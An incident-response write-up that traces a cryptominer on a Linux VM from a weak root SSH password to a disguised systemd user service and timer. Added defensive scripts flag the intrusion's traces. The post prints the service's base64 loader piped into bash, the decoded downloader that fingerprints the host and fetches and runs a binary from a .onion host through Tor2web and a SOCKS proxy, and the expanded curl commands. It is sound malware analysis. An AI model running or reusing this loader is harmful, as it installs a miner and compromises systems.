ESo1YS_Miner_Analysis

Just something to add a little uncertainty to otherwise dull work.

Compromise

I was happily writing a Tampermonkey script, switched over to the VM and saw the CPU meter in the top-right corner pegged.
top showed the CPU at 170%, which basically means a miner.

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND                                       
34967 root 20 0 2438752 8308 4 S 176.1 0.2 143:44.29 qMubU9A

netstat -antlp | grep 34967
tcp 0 0 172.31.130.144:54302 89.223.120.251:9090 ESTABLISHED 34967/qMubU9A

Dropped the IP into ThreatBook (微步) and confirmed it is a public mining pool.

Tracing the source

The VM only had SSH exposed, and root was using a weak password.

cat /var/log/auth.log | grep Accept
Jul 16 11:35:40 localhost sshd[1183603]: Accepted password for root from 172.31.134.56 port 41378 ssh2

As expected.

Ran nmap against that IP; it has quite a few ports open, and I have no idea whose server it is.
Reported it to the network admin, who couldn't be bothered.
Whatever; I just need to clean up the miner on my own box.
A project happened to need some malware samples recently, so I pulled the binary out via /proc/pid/exe and handed it to a colleague.
Hilarious.

Persistence

I assumed it would have set up a cron job, but it turned out to be a service.

ps axo pid,ppid,comm | grep 34967
34967 531 qMubU9A

ps axo pid,ppid,comm | grep 531  
531 1 systemd
534 531 (sd-pam)
682 531 dbus-daemon
991 531 gnome-keyring-d
1096 531 at-spi-bus-laun
1108 531 xfconfd
1114 531 at-spi2-registr
1126 531 gpg-agent
1132 531 gvfsd
1138 531 gvfsd-fuse
1233 531 pulseaudio
1234 531 xfce4-notifyd
1288 531 dconf-service
1344 531 gvfs-udisks2-vo
1413 531 gvfs-afc-volume
1419 531 gvfs-mtp-volume
1424 531 gvfs-gphoto2-vo
1433 531 gvfs-goa-volume
1458 531 gvfsd-metadata
1476 531 obexd
1691 531 FOe1wQ9
34967 531 qMubU9A
54540 531 JxM0JUD

So it is basically the last three processes that are the problem.
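As an added example (not from the original post), here is a small shell helper that applies the same heuristic the author applied by eye: among the children of the user's systemd instance (PID 531 here), flag command names that are seven random-looking alphanumerics mixing digits, upper and lower case. The ps sample is constructed from the lines above. The heuristic has no allow-list, so an oddly named but legitimate program will also be flagged; treat hits as leads for the /proc/<pid>/exe and netstat checks, not as verdicts.

```shell
#!/bin/sh
# Added example, not the original post's code: flag children of a
# "systemd --user" instance whose command names look like the random
# 7-character tokens seen above (qMubU9A, FOe1wQ9, JxM0JUD).
# Input is "ps axo pid,ppid,comm" output; the sample is constructed
# from the lines shown in the post.

SAMPLE_PS='  PID  PPID COMMAND
  531     1 systemd
  534   531 (sd-pam)
  682   531 dbus-daemon
 1126   531 gpg-agent
 1233   531 pulseaudio
 1691   531 FOe1wQ9
34967   531 qMubU9A
54540   531 JxM0JUD'

# Print "pid comm" for every child of the given parent pid whose comm is
# exactly 7 alphanumerics containing at least one digit, one upper-case and
# one lower-case letter. Reads ps output on stdin.
suspicious_children() {
    awk -v ppid="$1" '
        NR > 1 && $2 == ppid && length($3) == 7 && $3 ~ /^[A-Za-z0-9]+$/ \
            && $3 ~ /[0-9]/ && $3 ~ /[A-Z]/ && $3 ~ /[a-z]/ { print $1, $3 }'
}

# Same, but only the flagged names, space separated (handy for checks).
suspicious_names() {
    suspicious_children "$1" | awk '{ printf "%s%s", (NR > 1 ? " " : ""), $2 }'
}

if [ "${1:-}" = "--live" ]; then
    # Real run: every "systemd" whose parent is PID 1 is a per-user manager.
    for mgr in $(pgrep -P 1 -x systemd); do
        ps axo pid,ppid,comm | suspicious_children "$mgr"
    done
else
    # Default: run the heuristic over the constructed sample.
    printf '%s\n' "$SAMPLE_PS" | suspicious_children 531
fi
```

Run it with --live on a host to check the real process table; without arguments it only evaluates the embedded sample.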

systemctl status | grep -C 5 FOe1wQ9

│ ├─systemd-tmpfiles-cleanup.service
│ │ ├─ 1691 FOe1wQ9
│ │ ├─34967 qMubU9A
│ │ └─54540 JxM0JUD

Locating the service

locate systemd-tmpfiles-cleanup
/root/.config/systemd/user/systemd-tmpfiles-cleanup
/root/.config/systemd/user/systemd-tmpfiles-cleanup.service
/root/.config/systemd/user/systemd-tmpfiles-cleanup.timer
/root/.config/systemd/user/timers.target.wants/systemd-tmpfiles-cleanup.timer
/root/.local/share/systemd/timers/stamp-systemd-tmpfiles-cleanup.timer

Looking at the directory layout

tree /root/.config/systemd/user 
/root/.config/systemd/user
├── systemd-tmpfiles-cleanup
├── systemd-tmpfiles-cleanup.service
├── systemd-tmpfiles-cleanup.timer
└── timers.target.wants
    └── systemd-tmpfiles-cleanup.timer -> /root/.config/systemd/user/systemd-tmpfiles-cleanup.timer

Runs hourly

cat systemd-tmpfiles-cleanup.timer  
[Unit]
Description=Cleanup of User's Temporary Files
[Timer]
OnCalendar=hourly
Persistent=true
[Install]
WantedBy=timers.target

The service that keeps the program running

cat /root/.config/systemd/user/systemd-tmpfiles-cleanup.service
[Unit]
Description=Cleanup of User's Temporary Files
[Service]
Type=forking
ExecStart=/bin/bash -c "exec &>/dev/null;echo ESo1YS;echo RVNvMVlTCmV4ZWMgJj4vZGV2L251bGwKZXd2QkJlQ209Li8uJChkYXRlfG1kNXN1bXxoZWFkIC1jMjApCnFkbm1DdUZlPShkb2gtY2guYmxhaGRucy5jb20gZG9oLWRlLmJsYWhkbnMuY29tIGRvaC1qcC5ibGFoZG5zLmNvbSBkb2gtc2cuYmxhaGRucy5jb20gZG9oLmxpIGRvaC5wdWIgZG9oLmRucy5zYiBkbnMudHduaWMudHcpCmZ1V3RPY1RUPSIvdG1wL3N5c3RlbWQtcHJpdmF0ZS1hMTNiNTBiYTgzYmNjMzY3OTc5NWZlYzJmMTA2ZDAyZS1zeXN0ZW1kLWxvZ2luZC5zZXJ2aWNlLUVTbzFZUyIKa3pLWXBCVnI9ImN1cmwgLW02MCAtZnNTTGtBLSAtLWRvaC11cmwgaHR0cHM6Ly8ke3Fkbm1DdUZlWyQoKFJBTkRPTSUkeyNxZG5tQ3VGZVtAXX0pKV19L2Rucy1xdWVyeSIKektqSmtWV0Y9ImN1cmwgLW02MCAtZnNTTGtBLSIKY1ZYZnVWWm89InJlbGF5LnRvcjJzb2Nrcy5pbiIKdkJaakdNeEY9InJ1NnI0aW5rYWY0dGhsZ2ZsZzRpcXM1bWhxd3F1Ym9sczVxYWdzcHZ5YTR3aHAzZGdidm15aGFkIgpQQVRIPS90bXA6JGZ1V3RPY1RUOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbjokUEFUSAoKU3JUbElNa1QoKSB7CglyZWFkIHByb3RvIHNlcnZlciBwYXRoIDw8PCQoZWNobyAkezEvLy8vIH0pCglET0M9LyR7cGF0aC8vIC8vfQoJSE9TVD0ke3NlcnZlci8vOip9CglQT1JUPSR7c2VydmVyLy8qOn0KCVtbIHgiJHtIT1NUfSIgPT0geCIke1BPUlR9IiBdXSAmJiBQT1JUPTgwCglleGVjIDM8Pi9kZXYvdGNwLyR7SE9TVH0vJFBPUlQKCWVjaG8gLWVuICJHRVQgJHtET0N9IEhUVFAvMS4wXHJcblVzZXItQWdlbnQ6IC1cclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKCSh3aGlsZSByZWFkIGxpbmU7IGRvCglbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCglkb25lICYmIGNhdCkgPCYzCglleGVjIDM+Ji0KfQoKSXZaWnlvWXMoKSB7Cglmb3IgaSBpbiAkZnVXdE9jVFQgLiAvdXNyL2JpbiAvdmFyL3RtcCAvdG1wIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9CgpzbWhnY1FYUygpIHsKCWdKaWJ3TXBCPS9leGVjCglKek5aeWdXTT1jcjBfJChjdXJsIC00IGlkZW50Lm1lfHxjdXJsIC00IGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbilfJCh1bmFtZSAtcilfJChjYXQgL2V0Yy9tYWNoaW5lLWlkfHwoaXAgcnx8aG9zdG5hbWUgLWl8fGVjaG8gbm8taWQpfG1kNXN1bXxhd2sgTkY9MSkKCSRrektZcEJWciAteCBzb2NrczVoOi8vJGNWWGZ1VlpvOjkwNTAgLWUkSnpOWnlnV00gJHZCWmpHTXhGLm9uaW9uJGdKaWJ3TXBCIC1vJGV3dkJCZUNtIHx8ICRrektZcEJWciAtZSRKek5aeWdXTSAkMSRnSmlid01wQiAtbyRld3ZCQmVDbSB8fCAkektqSmtWV0YgLXggc29ja3M1aDovLyRjVlhmdVZabzo5MDUwIC1lJEp6Tlp5Z1dNICR2QlpqR014Ri5vbmlvbiRnSmlid01wQiAtbyRld3ZCQmVDbSB8fCAkektqSmtWV0YgLWUkSnpOWnlnV00gJDEkZ0ppYndNcEIgLW8kZXd2QkJlQ20KfQoKbVlWZVRMRFAoKSB7CgljaG1vZCAreCAkZXd2QkJlQ207JGV3dkJCZUNtO3JtIC1mICRld3ZCQmVDbQp9CgpCcE5SS0RlWSgpIHsKCXU9JHZCWmpHTXhGLnRvcjJ3ZWIuaXQvbG9hZC8KCWNkIC90bXAgJiYgY3VybCAtViB8fCAoU3JUbElNa1QgaHR0cDovLyR1L2N1KSB8IHRhciB6eHAKCUl2Wlp5b1lzCglzbWhnY1FYUyAkdkJaakdNeEYudG9yMndlYi5pdCB8fAoJc21oZ2NRWFMgJHZCWmpHTXhGLnRvcjJ3ZWIuaW4gfHwKCXNtaGdjUVhTICR2QlpqR014Ri50b3Iyd2ViLnJlCgltWVZlVExEUAp9CgpscyAvcHJvYy8kKGhlYWQgLTEgL3RtcC8uc3lzdGVtZC4xKS9tYXBzIHx8IEJwTlJLRGVZCg==|base64 -d|bash"
WorkingDirectory=~
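Added example, not part of the original post: a shell audit for exactly this persistence pattern. It walks a systemd unit directory and flags any service whose Exec* line decodes base64 and pipes the result into a shell, and separately lists units in a per-user directory whose names mimic vendor systemd-* units (vendor units are installed under /usr/lib/systemd, not written into ~/.config/systemd/user). The two sample unit files are constructed; the encoded blob in the bad one is just "echo hi" and is never executed, only pattern-matched.

```shell
#!/bin/sh
# Added example, not the original post's code: audit systemd unit files for
# the persistence pattern shown above. Sample units are constructed; the
# base64 blob in the bad one decodes to "echo hi" and is only grepped.

# Print every *.service under the given directories whose Exec* line decodes
# base64 and pipes the result into a shell interpreter (sh, bash, dash, zsh).
find_b64_exec_units() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -type f -name '*.service' | sort | while read -r unit; do
            if grep -E '^Exec(Start|StartPre|StartPost|Reload|Stop)=' "$unit" \
               | grep -Eq 'base64[[:space:]]+(-d|--decode)[^|]*\|[[:space:]]*(/usr)?(/bin/)?(ba|da|z)?sh([[:space:]]|"|$)'
            then
                printf '%s\n' "$unit"
            fi
        done
    done
}

# List unit files directly inside a per-user unit directory whose names begin
# with "systemd-". Vendor units live under /usr/lib/systemd/{system,user}, so
# one written into ~/.config/systemd/user deserves a closer look.
mimic_units_in_user_dir() {
    find "$1" -maxdepth 1 -type f -name 'systemd-*' 2>/dev/null | sort
}

# Build constructed sample units under "$1/user": one benign, one modelled on
# the service in the post (same name and shape, harmless payload).
setup_sample_units() {
    base="$1"
    mkdir -p "$base/user/timers.target.wants"
    cat > "$base/user/backup.service" <<'EOF'
[Unit]
Description=Nightly backup
[Service]
ExecStart=/usr/bin/rsync -a /home/me/docs /mnt/backup
EOF
    cat > "$base/user/systemd-tmpfiles-cleanup.service" <<'EOF'
[Unit]
Description=Cleanup of User's Temporary Files
[Service]
Type=forking
ExecStart=/bin/bash -c "exec &>/dev/null;echo ZWNobyBoaQo=|base64 -d|bash"
EOF
    cat > "$base/user/systemd-tmpfiles-cleanup.timer" <<'EOF'
[Unit]
Description=Cleanup of User's Temporary Files
[Timer]
OnCalendar=hourly
Persistent=true
[Install]
WantedBy=timers.target
EOF
}

# Stand-alone run: build the samples in a scratch directory, audit, clean up.
scratch=$(mktemp -d)
setup_sample_units "$scratch"
echo "units that decode base64 into a shell:"
find_b64_exec_units "$scratch/user"
echo "systemd-* units inside a per-user unit directory:"
mimic_units_in_user_dir "$scratch/user"
rm -rf "$scratch"
```

On a real host, point find_b64_exec_units at /etc/systemd/system and each ~/.config/systemd/user (root's is under /root, as seen above), and remember that a matching unit is only the loader: the timer next to it and anything listening under timers.target.wants also has to go.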

Downloader

The decoded result is as follows

ESo1YS
exec &>/dev/null
ewvBBeCm=./.$(date|md5sum|head -c20) # filename
qdnmCuFe=(doh-ch.blahdns.com doh-de.blahdns.com doh-jp.blahdns.com doh-sg.blahdns.com doh.li doh.pub doh.dns.sb dns.twnic.tw)
fuWtOcTT="/tmp/systemd-private-a13b50ba83bcc3679795fec2f106d02e-systemd-logind.service-ESo1YS"
kzKYpBVr="curl -m60 -fsSLkA- --doh-url https://${qdnmCuFe[$((RANDOM%${#qdnmCuFe[@]}))]}/dns-query" # dns over https
zKjJkVWF="curl -m60 -fsSLkA-" # curl
cVXfuVZo="relay.tor2socks.in" # proxy
vBZjGMxF="ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad"
PATH=/tmp:$fuWtOcTT:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:$PATH

SrTlIMkT() {
	read proto server path <<<$(echo ${1//// })
	DOC=/${path// //} # /load/cu
	HOST=${server//:*} # ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.it
	PORT=${server//*:} # ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.it
	[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
	exec 3<>/dev/tcp/${HOST}/$PORT # Open TCP Socket ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.it:80
	echo -en "GET ${DOC} HTTP/1.0\r\nUser-Agent: -\r\nHost: ${HOST}\r\n\r\n" >&3 # HTTP Request
	(while read line; do
	[[ "$line" == $'\r' ]] && break
	done && cat) <&3 # Download curl
	exec 3>&- # Close TCP Socket
}

IvZZyoYs() {
	for i in $fuWtOcTT . /usr/bin /var/tmp /tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done # Check write privilege in directories
}

smhgcQXS() {
	gJibwMpB=/exec
	JzNZygWM=cr0_$(curl -4 ident.me||curl -4 ip.sb)_$(whoami)_$(uname -n)_$(uname -r)_$(cat /etc/machine-id||(ip r||hostname -i||echo no-id)|md5sum|awk NF=1) #system info as referer
	$kzKYpBVr -x socks5h://$cVXfuVZo:9050 -e$JzNZygWM $vBZjGMxF.onion$gJibwMpB -o$ewvBBeCm || $kzKYpBVr -e$JzNZygWM $1$gJibwMpB -o$ewvBBeCm || $zKjJkVWF -x socks5h://$cVXfuVZo:9050 -e$JzNZygWM $vBZjGMxF.onion$gJibwMpB -o$ewvBBeCm || $zKjJkVWF -e$JzNZygWM $1$gJibwMpB -o$ewvBBeCm # ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.onion/exec via proxy socks5h://relay.tor2socks.in:9050 or $1/exec
}

mYVeTLDP() {
	chmod +x $ewvBBeCm;$ewvBBeCm;rm -f $ewvBBeCm # Execute
}

BpNRKDeY() {
	u=$vBZjGMxF.tor2web.it/load/
	cd /tmp && curl -V || (SrTlIMkT http://$u/cu) | tar zxp # Check curl, download curl if can't run it
	IvZZyoYs
	smhgcQXS $vBZjGMxF.tor2web.it ||
	smhgcQXS $vBZjGMxF.tor2web.in ||
	smhgcQXS $vBZjGMxF.tor2web.re
	mYVeTLDP
}

ls /proc/$(head -1 /tmp/.systemd.1)/maps || BpNRKDeY # Sandbox detection? Not sure.

For now, let's call this thing ESo1YS_Miner.

Step by step

cd /tmp && curl -V || (SrTlIMkT http://$u//cu) | tar zxp

This checks whether the curl binary is present; if it isn't, execution falls through to the function SrTlIMkT().

The argument passed into SrTlIMkT() is http://ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.it/load//cu

The domain is ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.it
and the port is 80.
It opens a TCP socket as fd 3 and then issues an HTTP request:

GET /load/cu/ HTTP/1.0
User-Agent: -
Host: ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.it


Then it reads the HTTP response body from fd 3,
and finally closes the socket.

Once downloaded and extracted, it is a curl binary

./curl --version
curl 7.85.0 (oasis) libcurl/7.85.0 BearSSL zlib/1.2.11
Release-Date: 2022-08-31
Protocols: dict file ftp ftps gopher gophers http https imap imaps mqtt rtsp smtp smtps telnet tftp
Features: alt-svc AsynchDNS HSTS IPv6 Largefile libz SSL threadsafe UnixSockets

The function IvZZyoYs() checks which of the candidate directories are writable

The function smhgcQXS() performs the download; expanded, the attempts it makes are:

curl -m60 -fsSLkA- --doh-url https://$random_domain/dns-query -x socks5h://relay.tor2socks.in:9050 -e$random_string ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.onion/exec -o$random_string

curl -m60 -fsSLkA- --doh-url https://$random_domain/dns-query -e$random_string ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.it/exec -o$random_string

curl -m60 -fsSLkA- -x socks5h://relay.tor2socks.in:9050 -e$random_string ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.onion/exec -o$random_string

curl -m60 -fsSLkA- -e$random_string ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.it/exec -o$random_string

curl -m60 -fsSLkA- --doh-url https://$random_domain/dns-query -e$random_string ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.in/exec -o$random_string

curl -m60 -fsSLkA- -e$random_string ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.in/exec -o$random_string

curl -m60 -fsSLkA- --doh-url https://$random_domain/dns-query -e$random_string ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.re/exec -o$random_string

curl -m60 -fsSLkA- -e$random_string ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad.tor2web.re/exec -o$random_string
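Added example, not from the original post: pulling the network indicators out of the decoded downloader statically, without running any of it. The excerpt below is constructed from the decoded lines shown above (the DoH resolver list, the staging path, the Tor gateways and the onion token). The obfuscated variable names are resolved purely textually, and only for simple single-assignment literals, so the output reads as the .onion host and socks5h://relay.tor2socks.in:9050 instead of $vBZjGMxF and $cVXfuVZo; anything built from $(...) or RANDOM is left untouched on purpose.

```shell
#!/bin/sh
# Added example, not the original post's code: static indicator extraction
# from the decoded downloader. The excerpt is constructed from lines shown in
# the post and is treated as text only; nothing in it is executed.

DOWNLOADER_EXCERPT='ESo1YS
exec &>/dev/null
ewvBBeCm=./.$(date|md5sum|head -c20)
qdnmCuFe=(doh-ch.blahdns.com doh-de.blahdns.com doh-jp.blahdns.com doh-sg.blahdns.com doh.li doh.pub doh.dns.sb dns.twnic.tw)
fuWtOcTT="/tmp/systemd-private-a13b50ba83bcc3679795fec2f106d02e-systemd-logind.service-ESo1YS"
kzKYpBVr="curl -m60 -fsSLkA- --doh-url https://${qdnmCuFe[$((RANDOM%${#qdnmCuFe[@]}))]}/dns-query"
zKjJkVWF="curl -m60 -fsSLkA-"
cVXfuVZo="relay.tor2socks.in"
vBZjGMxF="ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad"
PATH=/tmp:$fuWtOcTT:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:$PATH
gJibwMpB=/exec
$kzKYpBVr -x socks5h://$cVXfuVZo:9050 -e$JzNZygWM $vBZjGMxF.onion$gJibwMpB -o$ewvBBeCm || $kzKYpBVr -e$JzNZygWM $1$gJibwMpB -o$ewvBBeCm || $zKjJkVWF -x socks5h://$cVXfuVZo:9050 -e$JzNZygWM $vBZjGMxF.onion$gJibwMpB -o$ewvBBeCm || $zKjJkVWF -e$JzNZygWM $1$gJibwMpB -o$ewvBBeCm
u=$vBZjGMxF.tor2web.it/load/
cd /tmp && curl -V || (SrTlIMkT http://$u/cu) | tar zxp
smhgcQXS $vBZjGMxF.tor2web.it ||
smhgcQXS $vBZjGMxF.tor2web.in ||
smhgcQXS $vBZjGMxF.tor2web.re
ls /proc/$(head -1 /tmp/.systemd.1)/maps || BpNRKDeY'

# Resolve NAME=value assignments whose value is a plain literal (no $, backtick
# or parenthesis) and substitute $NAME / ${NAME} everywhere, longest names
# first so $ab never clobbers $abc. Everything else is left as written.
resolve_vars() {
    awk '
    {
        lines[NR] = $0
        if (match($0, /^[A-Za-z_][A-Za-z0-9_]*=/)) {
            name = substr($0, 1, RLENGTH - 1); val = substr($0, RLENGTH + 1)
            sub(/^"/, "", val); sub(/"$/, "", val)
            if (val !~ /[$`(]/) vars[name] = val
        }
    }
    END {
        n = 0; for (k in vars) names[++n] = k
        for (i = 2; i <= n; i++) {            # insertion sort by length, descending
            k = names[i]; j = i - 1
            while (j > 0 && length(names[j]) < length(k)) { names[j + 1] = names[j]; j-- }
            names[j + 1] = k
        }
        for (i = 1; i <= NR; i++) {
            line = lines[i]
            for (j = 1; j <= n; j++) {
                v = vars[names[j]]; gsub(/&/, "\\\\&", v)   # keep & literal in gsub
                gsub("\\$\\{?" names[j] "\\}?", v, line)
            }
            print line
        }
    }'
}

# Each extractor reads (resolved) script text on stdin and prints unique hits.
extract_onion()     { grep -oE '[a-z2-7]{56}\.onion' | sort -u; }
extract_tor2web()   { grep -oE '[a-z2-7]{56}\.tor2web\.[a-z]+' | sort -u; }
extract_proxy()     { grep -oE 'socks5h?://[A-Za-z0-9.-]+(:[0-9]+)?' | sort -u; }
extract_tmp_paths() { grep -oE '/tmp/[A-Za-z0-9._-]+' | sort -u; }
# The DoH resolvers sit in a bash array literal NAME=(a b c); split it on spaces.
extract_doh()       { sed -n 's/^[A-Za-z0-9_]*=(\(.*\))$/\1/p' | tr ' ' '\n'; }

report() {
    resolved=$(resolve_vars)
    for section in onion tor2web proxy doh tmp_paths; do
        echo "== $section =="
        printf '%s\n' "$resolved" | "extract_$section"
    done
}

printf '%s\n' "$DOWNLOADER_EXCERPT" | report
```

The .onion host, the three tor2web mirrors, the DoH resolver list, the socks5h relay and the two /tmp paths are the pieces worth blocking or hunting for; the resolver names are public services and only matter in combination with the rest.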

The downloaded file has MD5 73838d160eb7a23dfc8def07e8db1fa5.
Running it appears to drop two further files, 4045022d9d8a7c30bf9bfeb869316787 and dd4b52f33373c57093f1df396a76e058.
4045022d9d8a7c30bf9bfeb869316787 scans the internal network, while dd4b52f33373c57093f1df396a76e058 is the miner itself.
All three files are packed with a modified UPX and need manual unpacking; I'll look at that when I have time.


IDA's Linux remote debugger complains that it is a .so file and has to be debugged by attaching to the running process.

Debugging with gdbserver runs straight into an inexplicable exit syscall that just kills the program; I never even saw the unpacking routine.

Presumably there is some anti-debugging in there.

Looks like I'm still not able to unpack this one.